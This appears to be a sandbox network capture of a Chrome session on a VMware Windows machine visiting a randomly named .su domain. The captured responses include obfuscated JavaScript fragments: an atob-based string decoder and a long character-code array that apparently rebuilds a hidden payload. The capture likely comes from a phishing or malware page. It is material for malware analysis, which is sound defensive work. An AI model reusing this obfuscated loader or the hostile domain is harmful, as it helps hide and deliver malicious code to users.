                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          sec-ch-ua-platform: "Windows"
                                                          Upgrade-Insecure-Requests: 1
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: navigate
                                                          Sec-Fetch-Dest: document
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/Ad89NLTS/
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:29 UTC731INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:29 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=58gBp5xz%2FxXbwlVxkoncncpic0e8qoHZYnxqeG4zlsOyl4GByAw0kxvzEPGZp5y%2F07MqSN8T0dE0ry99%2BhQAMYytfT6K3sEnCitUGVBbXJq66P7tvhOb7hvzP2rUX1jwQwEoz9U7sgwzW1mjm%2B3phwzq42Re"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff5c1e1712f3-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:29 UTC556INData Raw: 32 32 35 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 76 61 72 20 62 63 68 74 6d 6c 20 3d 20 27 5a 70 51 78 57 4f 69 72 69 46 51 58 65 48 27 3b 0d 0a 66 75 6e 63 74 69 6f 6e 20 48 54 49 44 6d 53 72 42 48 41 45 28 69 52 51 49 67 4a 64 66 4e 6b 61 2c 20 50 41 6b 63 61 79 50 4f 46 71 66 65 29 20 7b 0d 0a 09 6c 65 74 20 54 4d 68 6a 53 46 45 72 69 20 3d 20 27 27 3b 0d 0a 09 69 52 51 49 67 4a 64 66 4e 6b 61 20 3d 20 61 74 6f 62 28 69 52 51 49 67 4a 64 66 4e 6b 61 29 3b 0d 0a 09 6c 65 74 20 4a 5a 77 56 69 49 4b 47 50 7a 77 20 3d 20 50 41 6b 63 61 79 50 4f 46 71 66 65 2e 6c 65 6e 67 74 68 3b 0d 0a 0d 0a 09 66 6f 72 20 28 6c 65 74 20 69 20 3d 20 30 3b 20 69 20 3c 20 69 52 51 49 67 4a 64 66 4e 6b 61 2e 6c 65 6e 67 74 68 3b 20 69 2b 2b 29 20 7b 0d 0a 09 09 54 4d 68 6a 53 46
                                                          Data Ascii: 225<script>var bchtml = 'ZpQxWOiriFQXeH';function HTIDmSrBHAE(iRQIgJdfNka, PAkcayPOFqfe) {let TMhjSFEri = '';iRQIgJdfNka = atob(iRQIgJdfNka);let JZwViIKGPzw = PAkcayPOFqfe.length;for (let i = 0; i < iRQIgJdfNka.length; i++) {TMhjSF
                                                          2024-01-24 14:34:29 UTC5INData Raw: 30 0d 0a 0d 0a
                                                          Data Ascii: 0


                                                          Session IDSource IPSource PortDestination IPDestination Port
                                                          33192.168.2.64975720.25.241.18443
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:29 UTC71OUTData Raw: 43 4e 54 20 31 20 43 4f 4e 20 33 30 35 0d 0a 4d 53 2d 43 56 3a 20 6c 39 62 50 6d 2f 46 59 58 30 57 79 54 62 47 73 2e 31 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 65 34 30 36 61 38 33 39 65 30 32 63 30 32 0d 0a 0d 0a
                                                          Data Ascii: CNT 1 CON 305MS-CV: l9bPm/FYX0WyTbGs.1Context: 3de406a839e02c02
                                                          2024-01-24 14:34:29 UTC249OUTData Raw: 3c 63 6f 6e 6e 65 63 74 3e 3c 76 65 72 3e 32 3c 2f 76 65 72 3e 3c 61 67 65 6e 74 3e 3c 6f 73 3e 57 69 6e 64 6f 77 73 3c 2f 6f 73 3e 3c 6f 73 56 65 72 3e 31 30 2e 30 2e 30 2e 30 2e 31 39 30 34 35 3c 2f 6f 73 56 65 72 3e 3c 70 72 6f 63 3e 78 36 34 3c 2f 70 72 6f 63 3e 3c 6c 63 69 64 3e 65 6e 2d 43 48 3c 2f 6c 63 69 64 3e 3c 67 65 6f 49 64 3e 32 32 33 3c 2f 67 65 6f 49 64 3e 3c 61 6f 61 63 3e 30 3c 2f 61 6f 61 63 3e 3c 64 65 76 69 63 65 54 79 70 65 3e 31 3c 2f 64 65 76 69 63 65 54 79 70 65 3e 3c 64 65 76 69 63 65 4e 61 6d 65 3e 56 4d 77 61 72 65 32 30 2c 31 3c 2f 64 65 76 69 63 65 4e 61 6d 65 3e 3c 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 74 72 75 65 3c 2f 66 6f 6c 6c 6f 77 52 65 74 72 79 3e 3c 2f 61 67 65 6e 74 3e 3c 2f 63 6f 6e 6e 65 63 74 3e
                                                          Data Ascii: <connect><ver>2</ver><agent><os>Windows</os><osVer>10.0.0.0.19045</osVer><proc>x64</proc><lcid>en-CH</lcid><geoId>223</geoId><aoac>0</aoac><deviceType>1</deviceType><deviceName>VMware20,1</deviceName><followRetry>true</followRetry></agent></connect>
                                                          2024-01-24 14:34:29 UTC1064OUTData Raw: 41 54 48 20 32 20 43 4f 4e 5c 44 45 56 49 43 45 20 31 30 34 31 0d 0a 4d 53 2d 43 56 3a 20 6c 39 62 50 6d 2f 46 59 58 30 57 79 54 62 47 73 2e 32 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 65 34 30 36 61 38 33 39 65 30 32 63 30 32 0d 0a 0d 0a 3c 64 65 76 69 63 65 3e 3c 63 6f 6d 70 61 63 74 2d 74 69 63 6b 65 74 3e 74 3d 45 77 43 6f 41 75 70 49 42 41 41 55 31 62 44 47 66 64 61 7a 69 44 66 58 70 6a 4e 35 4e 36 63 59 68 54 31 77 62 6d 51 41 41 52 77 2b 31 66 33 69 61 34 31 7a 5a 2b 77 76 46 41 79 4c 6a 79 4a 4f 35 78 62 41 42 68 6e 53 35 76 63 2f 63 50 34 66 65 41 6f 6c 56 30 51 4e 33 4a 6d 36 57 4e 72 67 4f 55 68 2f 76 6b 32 6c 34 42 67 2b 31 68 66 65 76 67 39 4b 67 31 59 53 55 5a 62 30 41 48 4c 79 53 39 58 33 6e 71 77 37 45 55 67 38 4e 78 67 62 61 6f 56 6a 6d 77
                                                          Data Ascii: ATH 2 CON\DEVICE 1041MS-CV: l9bPm/FYX0WyTbGs.2Context: 3de406a839e02c02<device><compact-ticket>t=EwCoAupIBAAU1bDGfdaziDfXpjN5N6cYhT1wbmQAARw+1f3ia41zZ+wvFAyLjyJO5xbABhnS5vc/cP4feAolV0QN3Jm6WNrgOUh/vk2l4Bg+1hfevg9Kg1YSUZb0AHLyS9X3nqw7EUg8NxgbaoVjmw
                                                          2024-01-24 14:34:29 UTC218OUTData Raw: 42 4e 44 20 33 20 43 4f 4e 5c 57 4e 53 20 30 20 31 39 37 0d 0a 4d 53 2d 43 56 3a 20 6c 39 62 50 6d 2f 46 59 58 30 57 79 54 62 47 73 2e 33 0d 0a 43 6f 6e 74 65 78 74 3a 20 33 64 65 34 30 36 61 38 33 39 65 30 32 63 30 32 0d 0a 0d 0a 3c 77 6e 73 3e 3c 76 65 72 3e 31 3c 2f 76 65 72 3e 3c 63 6c 69 65 6e 74 3e 3c 6e 61 6d 65 3e 57 50 4e 3c 2f 6e 61 6d 65 3e 3c 76 65 72 3e 31 2e 30 3c 2f 76 65 72 3e 3c 2f 63 6c 69 65 6e 74 3e 3c 6f 70 74 69 6f 6e 73 3e 3c 70 77 72 6d 6f 64 65 20 6d 6f 64 65 3d 22 30 22 3e 3c 2f 70 77 72 6d 6f 64 65 3e 3c 2f 6f 70 74 69 6f 6e 73 3e 3c 6c 61 73 74 4d 73 67 49 64 3e 30 3c 2f 6c 61 73 74 4d 73 67 49 64 3e 3c 2f 77 6e 73 3e
                                                          Data Ascii: BND 3 CON\WNS 0 197MS-CV: l9bPm/FYX0WyTbGs.3Context: 3de406a839e02c02<wns><ver>1</ver><client><name>WPN</name><ver>1.0</ver></client><options><pwrmode mode="0"></pwrmode></options><lastMsgId>0</lastMsgId></wns>
                                                          2024-01-24 14:34:29 UTC14INData Raw: 32 30 32 20 31 20 43 4f 4e 20 35 38 0d 0a
                                                          Data Ascii: 202 1 CON 58
                                                          2024-01-24 14:34:29 UTC58INData Raw: 4d 53 2d 43 56 3a 20 43 65 46 34 43 78 47 4e 47 30 71 58 68 61 78 62 35 37 33 78 49 51 2e 30 0d 0a 0d 0a 50 61 79 6c 6f 61 64 20 70 61 72 73 69 6e 67 20 66 61 69 6c 65 64 2e
                                                          Data Ascii: MS-CV: CeF4CxGNG0qXhaxb573xIQ.0Payload parsing failed.


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          34192.168.2.649755172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:29 UTC670OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/0eWLTvWEPE HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: */*
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: script
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:29 UTC740INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:29 GMT
                                                          Content-Type: text/javascript;charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=V6kFBzD74TU0jeWXFXD%2FK4fYAn5KD8lmLVSQRdeto41UJv4kM%2B3kD7hsn8iBdXqA%2B7PtW3TmeC1VTKWaR%2BN9qMppOOI6Klw9uvcKeVcx7DGsGQ2u1Tj%2BPklCMivf%2Fk8p6c3nYvXExnGlbikFTQxXRWphDlwd"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 84a8ff5e4c09b04e-ATL
                                                          alt-svc: h3=":443"; ma=86400
                                                          2024-01-24 14:34:29 UTC629INData Raw: 37 63 63 62 0d 0a 76 61 72 20 65 72 70 20 3d 20 6e 65 77 20 41 72 72 61 79 3b 0a 65 72 70 5b 30 5d 20 3d 20 38 30 3b 0a 65 72 70 5b 31 5d 20 3d 20 36 37 3b 0a 65 72 70 5b 32 5d 20 3d 20 37 30 3b 0a 65 72 70 5b 33 5d 20 3d 20 36 39 3b 0a 65 72 70 5b 34 5d 20 3d 20 38 34 3b 0a 65 72 70 5b 35 5d 20 3d 20 34 38 3b 0a 65 72 70 5b 36 5d 20 3d 20 37 38 3b 0a 65 72 70 5b 37 5d 20 3d 20 38 35 3b 0a 65 72 70 5b 38 5d 20 3d 20 38 37 3b 0a 65 72 70 5b 39 5d 20 3d 20 38 36 3b 0a 65 72 70 5b 31 30 5d 20 3d 20 36 36 3b 0a 65 72 70 5b 31 31 5d 20 3d 20 37 30 3b 0a 65 72 70 5b 31 32 5d 20 3d 20 37 33 3b 0a 65 72 70 5b 31 33 5d 20 3d 20 37 31 3b 0a 65 72 70 5b 31 34 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 31 35 5d 20 3d 20 34 38 3b 0a 65 72 70 5b 31 36 5d 20 3d 20 39 38 3b
                                                          Data Ascii: 7ccbvar erp = new Array;erp[0] = 80;erp[1] = 67;erp[2] = 70;erp[3] = 69;erp[4] = 84;erp[5] = 48;erp[6] = 78;erp[7] = 85;erp[8] = 87;erp[9] = 86;erp[10] = 66;erp[11] = 70;erp[12] = 73;erp[13] = 71;erp[14] = 104;erp[15] = 48;erp[16] = 98;
                                                          2024-01-24 14:34:29 UTC1369INData Raw: 0a 65 72 70 5b 34 33 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 34 34 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 34 35 5d 20 3d 20 31 30 39 3b 0a 65 72 70 5b 34 36 5d 20 3d 20 39 39 3b 0a 65 72 70 5b 34 37 5d 20 3d 20 35 37 3b 0a 65 72 70 5b 34 38 5d 20 3d 20 37 33 3b 0a 65 72 70 5b 34 39 5d 20 3d 20 31 30 39 3b 0a 65 72 70 5b 35 30 5d 20 3d 20 38 36 3b 0a 65 72 70 5b 35 31 5d 20 3d 20 31 31 37 3b 0a 65 72 70 5b 35 32 5d 20 3d 20 37 33 3b 0a 65 72 70 5b 35 33 5d 20 3d 20 31 30 36 3b 0a 65 72 70 5b 35 34 5d 20 3d 20 35 32 3b 0a 65 72 70 5b 35 35 5d 20 3d 20 35 36 3b 0a 65 72 70 5b 35 36 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 35 37 5d 20 3d 20 37 31 3b 0a 65 72 70 5b 35 38 5d 20 3d 20 38 36 3b 0a 65 72 70 5b 35 39 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 36 30 5d 20 3d 20
                                                          Data Ascii: erp[43] = 104;erp[44] = 98;erp[45] = 109;erp[46] = 99;erp[47] = 57;erp[48] = 73;erp[49] = 109;erp[50] = 86;erp[51] = 117;erp[52] = 73;erp[53] = 106;erp[54] = 52;erp[55] = 56;erp[56] = 97;erp[57] = 71;erp[58] = 86;erp[59] = 104;erp[60] =
                                                          2024-01-24 14:34:29 UTC1369INData Raw: 70 5b 31 33 36 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 31 33 37 5d 20 3d 20 38 37 3b 0a 65 72 70 5b 31 33 38 5d 20 3d 20 37 30 3b 0a 65 72 70 5b 31 33 39 5d 20 3d 20 31 31 35 3b 0a 65 72 70 5b 31 34 30 5d 20 3d 20 37 36 3b 0a 65 72 70 5b 31 34 31 5d 20 3d 20 38 38 3b 0a 65 72 70 5b 31 34 32 5d 20 3d 20 37 38 3b 0a 65 72 70 5b 31 34 33 5d 20 3d 20 31 30 36 3b 0a 65 72 70 5b 31 34 34 5d 20 3d 20 38 39 3b 0a 65 72 70 5b 31 34 35 5d 20 3d 20 38 37 3b 0a 65 72 70 5b 31 34 36 5d 20 3d 20 31 32 30 3b 0a 65 72 70 5b 31 34 37 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 31 34 38 5d 20 3d 20 38 30 3b 0a 65 72 70 5b 31 34 39 5d 20 3d 20 38 34 3b 0a 65 72 70 5b 31 35 30 5d 20 3d 20 36 39 3b 0a 65 72 70 5b 31 35 31 5d 20 3d 20 31 30 35 3b 0a 65 72 70 5b 31 35 32 5d 20 3d 20 38
                                                          Data Ascii: p[136] = 97;erp[137] = 87;erp[138] = 70;erp[139] = 115;erp[140] = 76;erp[141] = 88;erp[142] = 78;erp[143] = 106;erp[144] = 89;erp[145] = 87;erp[146] = 120;erp[147] = 108;erp[148] = 80;erp[149] = 84;erp[150] = 69;erp[151] = 105;erp[152] = 8
                                                          2024-01-24 14:34:29 UTC1369INData Raw: 31 32 32 3b 0a 65 72 70 5b 32 32 36 5d 20 3d 20 37 30 3b 0a 65 72 70 5b 32 32 37 5d 20 3d 20 31 32 32 3b 0a 65 72 70 5b 32 32 38 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 32 32 39 5d 20 3d 20 35 31 3b 0a 65 72 70 5b 32 33 30 5d 20 3d 20 37 34 3b 0a 65 72 70 5b 32 33 31 5d 20 3d 20 38 38 3b 0a 65 72 70 5b 32 33 32 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 32 33 33 5d 20 3d 20 38 36 3b 0a 65 72 70 5b 32 33 34 5d 20 3d 20 39 39 3b 0a 65 72 70 5b 32 33 35 5d 20 3d 20 35 33 3b 0a 65 72 70 5b 32 33 36 5d 20 3d 20 37 38 3b 0a 65 72 70 5b 32 33 37 5d 20 3d 20 37 32 3b 0a 65 72 70 5b 32 33 38 5d 20 3d 20 37 38 3b 0a 65 72 70 5b 32 33 39 5d 20 3d 20 37 37 3b 0a 65 72 70 5b 32 34 30 5d 20 3d 20 38 32 3b 0a 65 72 70 5b 32 34 31 5d 20 3d 20 31 31 30 3b 0a 65 72 70 5b 32 34 32 5d
                                                          Data Ascii: 122;erp[226] = 70;erp[227] = 122;erp[228] = 98;erp[229] = 51;erp[230] = 74;erp[231] = 88;erp[232] = 97;erp[233] = 86;erp[234] = 99;erp[235] = 53;erp[236] = 78;erp[237] = 72;erp[238] = 78;erp[239] = 77;erp[240] = 82;erp[241] = 110;erp[242]
                                                          2024-01-24 14:34:29 UTC1369INData Raw: 33 31 35 5d 20 3d 20 31 30 36 3b 0a 65 72 70 5b 33 31 36 5d 20 3d 20 38 30 3b 0a 65 72 70 5b 33 31 37 5d 20 3d 20 38 33 3b 0a 65 72 70 5b 33 31 38 5d 20 3d 20 37 33 3b 0a 65 72 70 5b 33 31 39 5d 20 3d 20 35 30 3b 0a 65 72 70 5b 33 32 30 5d 20 3d 20 38 36 3b 0a 65 72 70 5b 33 32 31 5d 20 3d 20 38 38 3b 0a 65 72 70 5b 33 32 32 5d 20 3d 20 31 31 32 3b 0a 65 72 70 5b 33 32 33 5d 20 3d 20 38 35 3b 0a 65 72 70 5b 33 32 34 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 33 32 35 5d 20 3d 20 38 35 3b 0a 65 72 70 5b 33 32 36 5d 20 3d 20 38 36 3b 0a 65 72 70 5b 33 32 37 5d 20 3d 20 38 37 3b 0a 65 72 70 5b 33 32 38 5d 20 3d 20 38 31 3b 0a 65 72 70 5b 33 32 39 5d 20 3d 20 34 38 3b 0a 65 72 70 5b 33 33 30 5d 20 3d 20 35 32 3b 0a 65 72 70 5b 33 33 31 5d 20 3d 20 31 31 38 3b 0a 65
                                                          Data Ascii: 315] = 106;erp[316] = 80;erp[317] = 83;erp[318] = 73;erp[319] = 50;erp[320] = 86;erp[321] = 88;erp[322] = 112;erp[323] = 85;erp[324] = 98;erp[325] = 85;erp[326] = 86;erp[327] = 87;erp[328] = 81;erp[329] = 48;erp[330] = 52;erp[331] = 118;e
                                                          2024-01-24 14:34:29 UTC1369INData Raw: 30 30 3b 0a 65 72 70 5b 34 30 35 5d 20 3d 20 37 31 3b 0a 65 72 70 5b 34 30 36 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 34 30 37 5d 20 3d 20 31 31 38 3b 0a 65 72 70 5b 34 30 38 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 34 30 39 5d 20 3d 20 31 30 36 3b 0a 65 72 70 5b 34 31 30 5d 20 3d 20 31 31 32 3b 0a 65 72 70 5b 34 31 31 5d 20 3d 20 31 30 39 3b 0a 65 72 70 5b 34 31 32 5d 20 3d 20 39 37 3b 0a 65 72 70 5b 34 31 33 5d 20 3d 20 38 38 3b 0a 65 72 70 5b 34 31 34 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 34 31 35 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 34 31 36 5d 20 3d 20 39 30 3b 0a 65 72 70 5b 34 31 37 5d 20 3d 20 36 38 3b 0a 65 72 70 5b 34 31 38 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 34 31 39 5d 20 3d 20 31 30 35 3b 0a 65 72 70 5b 34 32 30 5d 20 3d 20 39 38 3b 0a 65 72
                                                          Data Ascii: 00;erp[405] = 71;erp[406] = 108;erp[407] = 118;erp[408] = 98;erp[409] = 106;erp[410] = 112;erp[411] = 109;erp[412] = 97;erp[413] = 88;erp[414] = 104;erp[415] = 108;erp[416] = 90;erp[417] = 68;erp[418] = 116;erp[419] = 105;erp[420] = 98;er
                                                          2024-01-24 14:34:29 UTC1369INData Raw: 33 3b 0a 65 72 70 5b 34 39 34 5d 20 3d 20 31 31 39 3b 0a 65 72 70 5b 34 39 35 5d 20 3d 20 31 32 31 3b 0a 65 72 70 5b 34 39 36 5d 20 3d 20 37 38 3b 0a 65 72 70 5b 34 39 37 5d 20 3d 20 38 34 3b 0a 65 72 70 5b 34 39 38 5d 20 3d 20 38 35 3b 0a 65 72 70 5b 34 39 39 5d 20 3d 20 31 31 35 3b 0a 65 72 70 5b 35 30 30 5d 20 3d 20 37 37 3b 0a 65 72 70 5b 35 30 31 5d 20 3d 20 31 30 36 3b 0a 65 72 70 5b 35 30 32 5d 20 3d 20 38 35 3b 0a 65 72 70 5b 35 30 33 5d 20 3d 20 34 39 3b 0a 65 72 70 5b 35 30 34 5d 20 3d 20 37 36 3b 0a 65 72 70 5b 35 30 35 5d 20 3d 20 36 37 3b 0a 65 72 70 5b 35 30 36 5d 20 3d 20 35 32 3b 0a 65 72 70 5b 35 30 37 5d 20 3d 20 31 32 31 3b 0a 65 72 70 5b 35 30 38 5d 20 3d 20 37 35 3b 0a 65 72 70 5b 35 30 39 5d 20 3d 20 38 34 3b 0a 65 72 70 5b 35 31 30
                                                          Data Ascii: 3;erp[494] = 119;erp[495] = 121;erp[496] = 78;erp[497] = 84;erp[498] = 85;erp[499] = 115;erp[500] = 77;erp[501] = 106;erp[502] = 85;erp[503] = 49;erp[504] = 76;erp[505] = 67;erp[506] = 52;erp[507] = 121;erp[508] = 75;erp[509] = 84;erp[510
                                                          2024-01-24 14:34:29 UTC1369INData Raw: 3b 0a 65 72 70 5b 35 38 33 5d 20 3d 20 34 39 3b 0a 65 72 70 5b 35 38 34 5d 20 3d 20 37 37 3b 0a 65 72 70 5b 35 38 35 5d 20 3d 20 37 32 3b 0a 65 72 70 5b 35 38 36 5d 20 3d 20 36 36 3b 0a 65 72 70 5b 35 38 37 5d 20 3d 20 35 32 3b 0a 65 72 70 5b 35 38 38 5d 20 3d 20 37 39 3b 0a 65 72 70 5b 35 38 39 5d 20 3d 20 35 30 3b 0a 65 72 70 5b 35 39 30 5d 20 3d 20 37 34 3b 0a 65 72 70 5b 35 39 31 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 35 39 32 5d 20 3d 20 38 39 3b 0a 65 72 70 5b 35 39 33 5d 20 3d 20 35 30 3b 0a 65 72 70 5b 35 39 34 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 35 39 35 5d 20 3d 20 31 31 30 3b 0a 65 72 70 5b 35 39 36 5d 20 3d 20 39 39 3b 0a 65 72 70 5b 35 39 37 5d 20 3d 20 31 30 39 3b 0a 65 72 70 5b 35 39 38 5d 20 3d 20 35 37 3b 0a 65 72 70 5b 35 39 39 5d 20
                                                          Data Ascii: ;erp[583] = 49;erp[584] = 77;erp[585] = 72;erp[586] = 66;erp[587] = 52;erp[588] = 79;erp[589] = 50;erp[590] = 74;erp[591] = 104;erp[592] = 89;erp[593] = 50;erp[594] = 116;erp[595] = 110;erp[596] = 99;erp[597] = 109;erp[598] = 57;erp[599]
                                                          2024-01-24 14:34:29 UTC1369INData Raw: 39 3b 0a 65 72 70 5b 36 37 32 5d 20 3d 20 37 37 3b 0a 65 72 70 5b 36 37 33 5d 20 3d 20 36 37 3b 0a 65 72 70 5b 36 37 34 5d 20 3d 20 38 35 3b 0a 65 72 70 5b 36 37 35 5d 20 3d 20 35 35 3b 0a 65 72 70 5b 36 37 36 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 36 37 37 5d 20 3d 20 35 31 3b 0a 65 72 70 5b 36 37 38 5d 20 3d 20 39 30 3b 0a 65 72 70 5b 36 37 39 5d 20 3d 20 31 30 38 3b 0a 65 72 70 5b 36 38 30 5d 20 3d 20 39 39 3b 0a 65 72 70 5b 36 38 31 5d 20 3d 20 31 30 39 3b 0a 65 72 70 5b 36 38 32 5d 20 3d 20 39 30 3b 0a 65 72 70 5b 36 38 33 5d 20 3d 20 31 31 35 3b 0a 65 72 70 5b 36 38 34 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 36 38 35 5d 20 3d 20 35 31 3b 0a 65 72 70 5b 36 38 36 5d 20 3d 20 39 39 3b 0a 65 72 70 5b 36 38 37 5d 20 3d 20 35 34 3b 0a 65 72 70 5b 36 38 38 5d 20
                                                          Data Ascii: 9;erp[672] = 77;erp[673] = 67;erp[674] = 85;erp[675] = 55;erp[676] = 98;erp[677] = 51;erp[678] = 90;erp[679] = 108;erp[680] = 99;erp[681] = 109;erp[682] = 90;erp[683] = 115;erp[684] = 98;erp[685] = 51;erp[686] = 99;erp[687] = 54;erp[688]
                                                          2024-01-24 14:34:29 UTC1369INData Raw: 65 72 70 5b 37 36 31 5d 20 3d 20 31 31 30 3b 0a 65 72 70 5b 37 36 32 5d 20 3d 20 38 32 3b 0a 65 72 70 5b 37 36 33 5d 20 3d 20 31 30 34 3b 0a 65 72 70 5b 37 36 34 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 37 36 35 5d 20 3d 20 31 30 35 3b 0a 65 72 70 5b 37 36 36 5d 20 3d 20 36 36 3b 0a 65 72 70 5b 37 36 37 5d 20 3d 20 31 32 32 3b 0a 65 72 70 5b 37 36 38 5d 20 3d 20 39 39 3b 0a 65 72 70 5b 37 36 39 5d 20 3d 20 37 31 3b 0a 65 72 70 5b 37 37 30 5d 20 3d 20 37 30 3b 0a 65 72 70 5b 37 37 31 5d 20 3d 20 31 31 37 3b 0a 65 72 70 5b 37 37 32 5d 20 3d 20 37 33 3b 0a 65 72 70 5b 37 37 33 5d 20 3d 20 37 32 3b 0a 65 72 70 5b 37 37 34 5d 20 3d 20 31 31 36 3b 0a 65 72 70 5b 37 37 35 5d 20 3d 20 31 30 36 3b 0a 65 72 70 5b 37 37 36 5d 20 3d 20 39 38 3b 0a 65 72 70 5b 37 37 37 5d
                                                          Data Ascii: erp[761] = 110;erp[762] = 82;erp[763] = 104;erp[764] = 98;erp[765] = 105;erp[766] = 66;erp[767] = 122;erp[768] = 99;erp[769] = 71;erp[770] = 70;erp[771] = 117;erp[772] = 73;erp[773] = 72;erp[774] = 116;erp[775] = 106;erp[776] = 98;erp[777]


                                                          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                          35192.168.2.649760172.67.199.1734432104C:\Program Files\Google\Chrome\Application\chrome.exe
                                                          TimestampBytes transferredDirectionData
                                                          2024-01-24 14:34:30 UTC706OUTGET /VDgyaQMqDddyxrJrBbYdMwrE/6Jv3UEQZN3wq33YY/1sorWiW94sLFre7 HTTP/1.1
                                                          Host: iajjfhkbqnkrnryejn.ypiqzxx7wocs.su
                                                          Connection: keep-alive
                                                          sec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"
                                                          sec-ch-ua-mobile: ?0
                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36
                                                          sec-ch-ua-platform: "Windows"
                                                          Accept: text/css,*/*;q=0.1
                                                          Sec-Fetch-Site: same-origin
                                                          Sec-Fetch-Mode: no-cors
                                                          Sec-Fetch-Dest: style
                                                          Referer: https://iajjfhkbqnkrnryejn.ypiqzxx7wocs.su/VDgyaQMqDddyxrJrBbYdMwrE/?0eWLTvWEPE
                                                          Accept-Encoding: gzip, deflate, br
                                                          Accept-Language: en-US,en;q=0.9
                                                          Cookie: PHPSESSID=egfnet9pnqrimeoqe9hrn6khcn
                                                          2024-01-24 14:34:30 UTC731INHTTP/1.1 200 OK
                                                          Date: Wed, 24 Jan 2024 14:34:30 GMT
                                                          Content-Type: text/css;charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: close
                                                          expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                          cache-control: no-store, no-cache, must-revalidate
                                                          pragma: no-cache
                                                          vary: Accept-Encoding
                                                          CF-Cache-Status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=Ju%2F0bgDEMbcLDovww1xeN9Jn%2F9Y9tuo3HZwanwJkBJXIxoPA9x8oOrfC5D3ekKNNLBrI%2FV8K71NXHVI%2F3buTtyFBxHNiOlKfxrs37tqcRzvxmMXtIRsDmB1YpHcSQayx8B4VfzoNwWEWtQ%2F7Uvco4HZtNkDr"}],"group":"cf-nel","max_age":604800}
